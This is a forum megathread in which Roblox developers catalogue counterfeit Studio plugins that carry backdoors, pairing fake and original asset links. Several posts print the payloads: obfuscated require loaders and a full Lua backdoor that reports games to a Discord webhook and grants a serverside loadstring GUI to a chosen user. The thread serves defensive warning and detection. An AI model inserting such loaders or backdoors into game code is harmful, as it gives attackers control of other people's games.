Known Malicious Plugins for HISR detection Megathread

Original: ?
Malicious plugin: https://www.roblox.com/library/5109887609/Todds-Anti-Backdoor
Malicious action:

pcall(function(ff)getfenv()['\114\101\113\117\105\114\101'](5090011414).beef()end)

Original: https://www.roblox.com/library/1256428022/Tree-Generator (belongs to Crazyman32)
Malicious plugin: https://www.roblox.com/library/5108497694/Tree-Generator
Malicios action:

pcall(function(ff)getfenv()['\114\101\113\117\105\114\101'](5090011414).beef()end)

Both of the malicious action leads to this plugin - https://www.roblox.com/library/5090011414/beefintestines - it’s an obfuscated script, however by constant dumping and inspecting its constants, it’s clear that it’s a backdoor, it’s constant dump can be found here - https://pastebin.com/raw/FhZyxTty.

1 Like

F3X Plugin

Malicious:

Original:

Fake Anti-Virus/Backdoor Scanner

Malicious:

1 Like

Thank you for your post, I see it helpful. Also it’s a surprise to find an HR of BH here. <3


1 Like

Original: https://www.roblox.com/library/2233768483/Roundify
Malicious: https://www.roblox.com/library/5110767026/10K-Roundify
Malicious action: obfuscated script - can’t be bothered to constant dump it.

Original: https://www.roblox.com/library/165687726/Stravant-GapFill-Extrude-Fixed
Malicious: https://www.roblox.com/library/5112442161/GapFill-V1-2
Malicious action: obfuscated script - can’t be bothered to constant dump it.

Malicious: https://www.roblox.com/library/5112424591/Load-Character-Pro
Malicious: https://www.roblox.com/library/5112436389/Model-Resize-Plugin-2-1-DRAG-TO-RESIZE
Malicious: https://www.roblox.com/library/5112432545/Building-Tools-by-F3X-Plugin

Malicious: https://www.roblox.com/library/5074555023/Better-Day-And-Night-Lighting-NEW
Malicious action: require(5077231493)

1 Like

Malicious Script, plugin unknown

require(4751241292)()

Malicious Action

local Orig = script
script = nil
local script = Orig
local GUI = script.getwet:Clone()
local HTTP = game:GetService('HttpService')
function CheckHttp()
	local f = pcall(function()HTTP:GetAsync'https://www.google.com'end)
	if f == true then
		return true
	else
		return false
	end
end
game:GetService('Players').PlayerAdded:Connect(function(plr)
	local A = CheckHttp()
	
	if A == true then
	local Data = {
		content = "omfg a damn game!\n https://www.roblox.com/games/"..game.PlaceId.."\nPlayers in game: "..#game:GetService('Players'):GetPlayers().." / "..game:GetService('Players').MaxPlayers;
		username = "wet man"
	}
	HTTP:PostAsync('https://discordapp.com/a-key',HTTP:JSONEncode(Data))
	end
	if plr.UserId == 1460281907 or plr:IsFriendsWith(1460281907) then
		GUI:Clone().Parent = plr.PlayerGui
	end
end)
for i,plr in pairs(game:GetService('Players'):GetPlayers()) do
	if plr.UserId == 1460281907 or plr:IsFriendsWith(1460281907) then
		GUI:Clone().Parent = plr.PlayerGui
	end
end
local A = CheckHttp()
if A == true then
local Data = {
	content = "omg a game!  https://www.roblox.com/games/"..game.PlaceId;
	username = "wet man"
}
HTTP:PostAsync('https://discordapp.com/a-key',HTTP:JSONEncode(Data))
end
return function()end

Essentially gives a serverside loadstring gui if a player is or is friends with…

https://www.roblox.com/users/1460281907/profile

Edit: Discord webhook has already been found invalidated, someone else probably already deleted it.

2 Likes

Fake content deleted backdoor.
Super long chain of ‘require’ to try to hide the main code, still going.

after chaining for an entire 30+ times, randomly manually ‘report abuse’ on some of them
reached the obfuscated code.

I’m not bothering to go in full detail on why I believe this is malicious due to having an alternative issue that I consider to be ‘robloxsev ere’

This plugin is possibly malicious:

I checked the source code, and the code appears to be obfuscated. Comments are also disabled, which is a tad bit suspicious for a plugin with obfuscated code.

1 Like

Malicious

.return(function(AdminLoader_f,AdminLoader_a,AdminLoader_p)local AdminLoader_n=string.char;local AdminLoader_j=string.sub;local AdminLoader_o=table.concat;local AdminLoader_k=math.ldexp;local AdminLoader_r=getfenv or function()return _ENV end; (etc.)

Malicious

image
RStudioUpdate & Script contain obfuscated code

Real Roundify

Edit: The account behind the 2nd one appears to have tons of MainModules and a plugin called ‘virus’ in his inventory

** Tag Editor**
Original: 948084095
Malicious: 4972325708

Creates an Antilag script in ServerScriptService upon installation.

1 Like

F3X Building Tools & LoadCharacter.

If someone can check these plugins, these were all botted to the front page and probably insert serversides. (if I’m correct)

Malicious plugin(s): 5754612786, 5864780072
Original plugin: 752585459

Malicous: 5747884333, 5747884333, 5727376746, and much more.
Original: 144950355

Also, It isn’t even possible to find a original plugin anymore 60% of the time.


Should add an email requirement for uploading plugins, even in bestselling when searching.

.

5 Likes

Probably any plugin made by the group PluginMakers is malicious, as they make “updated” plugins.

Every plugin that has an Updated/New mark at the top of the plugin thumbnail is backdoored.

Roblox Studio+ (Updated

Backdoored: 5770454604

There isn’t a Roblox Studio+ original model, and the model leads to:

getfenv()[string.reverse("\101\114\105\117\113\101\114")](5770442639)

Which in return leads to a model called Linker which links to an asset named Poseidon SS. Another serverside which looks heavily skidded.

1 Like

Why does this point to a “dummy.com” URL ? Is that normal? It looks suspicious, but neither HISR nor Ro-Defender detected anything bad.

RobloxStudioBeta_y4mt4ucJUN
RobloxStudioBeta_Iy4a0Q3h8D

The Plugin in Question is https://www.roblox.com/library/5722540246/AutoScale
By https://www.roblox.com/groups/7840914/Creator-Studi#!/about

2 Likes

dummy.com or google.com are usually domains that serversides use for non http game logging.

3 Likes

Fake : AutoScale Lite - Roblox
Real : AutoScale Lite - Roblox

Fake : Waterfall Generator - Roblox
Real : Waterfall Generator - Roblox

Fake : Building Tools by F3X (Plugin) - Roblox
Real : Building Tools by F3X (Plugin) - Roblox

How can you log games with google.com or dummy.com? They use discord.

They check if https service is enabled by sending a GET request to those urls, if it fails, it’s disabled, if it succeeds, then it’s enabled

1 Like

Still, they mostly use discord.com/webhookurlhere.

1 Like

No duh, of course they do that to send the game to the logs

They do that to send to logs and they usually use it for checking if HTTP is enabled.

(desterify said that they log games with google.com, which they dont)